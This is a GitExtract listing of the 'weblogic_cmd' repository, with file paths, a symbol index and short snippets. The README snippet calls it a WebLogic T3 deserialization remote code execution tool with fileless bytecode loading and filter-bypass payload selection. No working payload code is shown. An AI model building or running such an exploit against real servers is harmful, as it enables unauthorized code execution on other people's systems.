method createSocket (line 69) | public Socket createSocket(InetAddress var1, int var2, int var3) throw...
method getDefaultCipherSuites (line 103) | public String[] getDefaultCipherSuites() {
method getSupportedCipherSuites (line 111) | public String[] getSupportedCipherSuites() {
method createSocket (line 119) | public Socket createSocket(Socket var1, String var2, int var3, boolean...
method getSocketFactory (line 123) | private javax.net.ssl.SSLSocketFactory getSocketFactory() throws IOExc...
method getSSLClientInfo (line 132) | public SSLClientInfo getSSLClientInfo() {
method createSSLClientInfo (line 136) | private SSLClientInfo createSSLClientInfo() throws IOException {
method setSSLClientInfo (line 149) | public void setSSLClientInfo(SSLClientInfo var1) {
Condensed preview — 39 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (149K chars).
[
{
"path": ".idea/artifacts/weblogic_cmd_jar.xml",
"chars": 873,
"preview": "<component name=\"ArtifactManager\">\n <artifact type=\"jar\" name=\"weblogic_cmd:jar\">\n <output-path>$PROJECT_DIR$/out/ar"
},
{
"path": ".idea/description.html",
"chars": 97,
"preview": "<html>Simple <b>Java</b> application that includes a class with <code>main()</code> method</html>"
},
{
"path": ".idea/excludeFromValidation.xml",
"chars": 216,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"ExcludeFromValidation\">\n <file url=\"f"
},
{
"path": ".idea/libraries/commons_cli_1_4.xml",
"chars": 220,
"preview": "<component name=\"libraryTable\">\n <library name=\"commons-cli-1.4\">\n <CLASSES>\n <root url=\"jar://$PROJECT_DIR$/li"
},
{
"path": ".idea/libraries/commons_collections_3_1.xml",
"chars": 236,
"preview": "<component name=\"libraryTable\">\n <library name=\"commons-collections-3.1\">\n <CLASSES>\n <root url=\"jar://$PROJECT"
},
{
"path": ".idea/libraries/jsafeFIPS.xml",
"chars": 208,
"preview": "<component name=\"libraryTable\">\n <library name=\"jsafeFIPS\">\n <CLASSES>\n <root url=\"jar://$PROJECT_DIR$/lib/jsaf"
},
{
"path": ".idea/libraries/wlcipher.xml",
"chars": 206,
"preview": "<component name=\"libraryTable\">\n <library name=\"wlcipher\">\n <CLASSES>\n <root url=\"jar://$PROJECT_DIR$/lib/wlcip"
},
{
"path": ".idea/libraries/wlfullclient.xml",
"chars": 291,
"preview": "<component name=\"libraryTable\">\n <library name=\"wlfullclient\">\n <CLASSES>\n <root url=\"jar://$PROJECT_DIR$/lib/w"
},
{
"path": ".idea/misc.xml",
"chars": 404,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"ProjectKey\">\n <option name=\"state\" va"
},
{
"path": ".idea/modules.xml",
"chars": 264,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"ProjectModuleManager\">\n <modules>\n "
},
{
"path": ".idea/project-template.xml",
"chars": 89,
"preview": "<template>\n <input-field default=\"com.company\">IJ_BASE_PACKAGE</input-field>\n</template>"
},
{
"path": ".idea/uiDesigner.xml",
"chars": 8792,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n <component name=\"Palette2\">\n <group name=\"Swing\">\n "
},
{
"path": "README.md",
"chars": 418,
"preview": "# weblogic_cmd\nweblogic t3 deserialization rce\n\n1. 直接通过加载字节码的方式来加载class,执行无文件生成。通过绑定rmi来实现回显。\n2. 支持t3s\n3. 支持StreamMessag"
},
{
"path": "src/META-INF/MANIFEST.MF",
"chars": 53,
"preview": "Manifest-Version: 1.0\nMain-Class: com.supeream.Main\n\n"
},
{
"path": "src/com/supeream/Main.java",
"chars": 8686,
"preview": "package com.supeream;\n\nimport com.supeream.serial.BytesOperation;\nimport com.supeream.ssl.WeblogicTrustManager;\nimport c"
},
{
"path": "src/com/supeream/payload/PayloadTest.java",
"chars": 1141,
"preview": "package com.supeream.payload;\n\nimport com.supeream.serial.BytesOperation;\nimport sun.org.mozilla.javascript.internal.Def"
},
{
"path": "src/com/supeream/payload/RemoteImpl.java",
"chars": 3078,
"preview": "package com.supeream.payload;\n\nimport sun.tools.asm.TryData;\nimport weblogic.cluster.singleton.ClusterMasterRemote;\nimpo"
},
{
"path": "src/com/supeream/serial/BytesOperation.java",
"chars": 2312,
"preview": "package com.supeream.serial;\n\n//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower "
},
{
"path": "src/com/supeream/serial/Reflections.java",
"chars": 1142,
"preview": "package com.supeream.serial;\n\nimport java.lang.reflect.Constructor;\nimport java.lang.reflect.Field;\n\npublic class Reflec"
},
{
"path": "src/com/supeream/serial/SerialDataGenerator.java",
"chars": 12615,
"preview": "package com.supeream.serial;\n\nimport com.supeream.weblogic.BypassPayloadSelector;\nimport org.apache.commons.collections."
},
{
"path": "src/com/supeream/serial/Serializables.java",
"chars": 987,
"preview": "package com.supeream.serial;\n\nimport java.io.*;\n\npublic class Serializables {\n\n public static byte[] serialize(final "
},
{
"path": "src/com/supeream/ssl/SocketFactory.java",
"chars": 925,
"preview": "package com.supeream.ssl;\n\nimport com.supeream.Main;\n\nimport javax.net.ssl.SSLContext;\nimport javax.net.ssl.SSLSocketFac"
},
{
"path": "src/com/supeream/ssl/TrustManagerImpl.java",
"chars": 618,
"preview": "package com.supeream.ssl;\n\nimport javax.net.ssl.X509TrustManager;\nimport java.security.cert.CertificateException;\nimport"
},
{
"path": "src/com/supeream/ssl/WeblogicTrustManager.java",
"chars": 341,
"preview": "package com.supeream.ssl;\n\nimport weblogic.security.SSL.TrustManager;\n\nimport java.security.cert.X509Certificate;\n\n/**\n "
},
{
"path": "src/com/supeream/weblogic/BypassPayloadSelector.java",
"chars": 1212,
"preview": "package com.supeream.weblogic;\n\nimport com.supeream.Main;\nimport com.supeream.serial.Serializables;\nimport weblogic.corb"
},
{
"path": "src/com/supeream/weblogic/ObjectTest.java",
"chars": 819,
"preview": "package com.supeream.weblogic;\n\nimport com.supeream.serial.BytesOperation;\n\nimport java.io.*;\n\n/**\n * Created by nike on"
},
{
"path": "src/com/supeream/weblogic/T3ProtocolOperation.java",
"chars": 4782,
"preview": "package com.supeream.weblogic;\n\n//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflowe"
},
{
"path": "src/com/supeream/weblogic/T3Test.java",
"chars": 8648,
"preview": "package com.supeream.weblogic;\n\nimport com.supeream.Main;\nimport com.supeream.payload.RemoteImpl;\nimport com.supeream.se"
},
{
"path": "src/com/supeream/weblogic/WebLogicOperation.java",
"chars": 1815,
"preview": "package com.supeream.weblogic;\n\n//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflowe"
},
{
"path": "src/weblogic/jms/common/StreamMessageImpl.java",
"chars": 36908,
"preview": "//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower decompiler)\n//\n\npackage weblog"
},
{
"path": "src/weblogic/security/utils/SSLSetup.java",
"chars": 27548,
"preview": "//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower decompiler)\n//\n\npackage weblog"
},
{
"path": "src/weblogic/security/utils/SSLTrustValidator.java",
"chars": 7778,
"preview": "//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower decompiler)\n//\n\npackage weblog"
},
{
"path": "src/weblogic/socket/ChannelSSLSocketFactory.java",
"chars": 6767,
"preview": "//\n// Source code recreated from a .class file by IntelliJ IDEA\n// (powered by Fernflower decompiler)\n//\n\npackage weblog"
},
{
"path": "weblogic_cmd.iml",
"chars": 780,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<module type=\"JAVA_MODULE\" version=\"4\">\n <component name=\"NewModuleRootManager\" "
}
]
// ... and 5 more files (download for full content)
About this extraction
This page contains the full source code of the 5up3rc/weblogic_cmd GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 39 files (55.8 MB), approximately 33.8k tokens, and a symbol index with 180 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.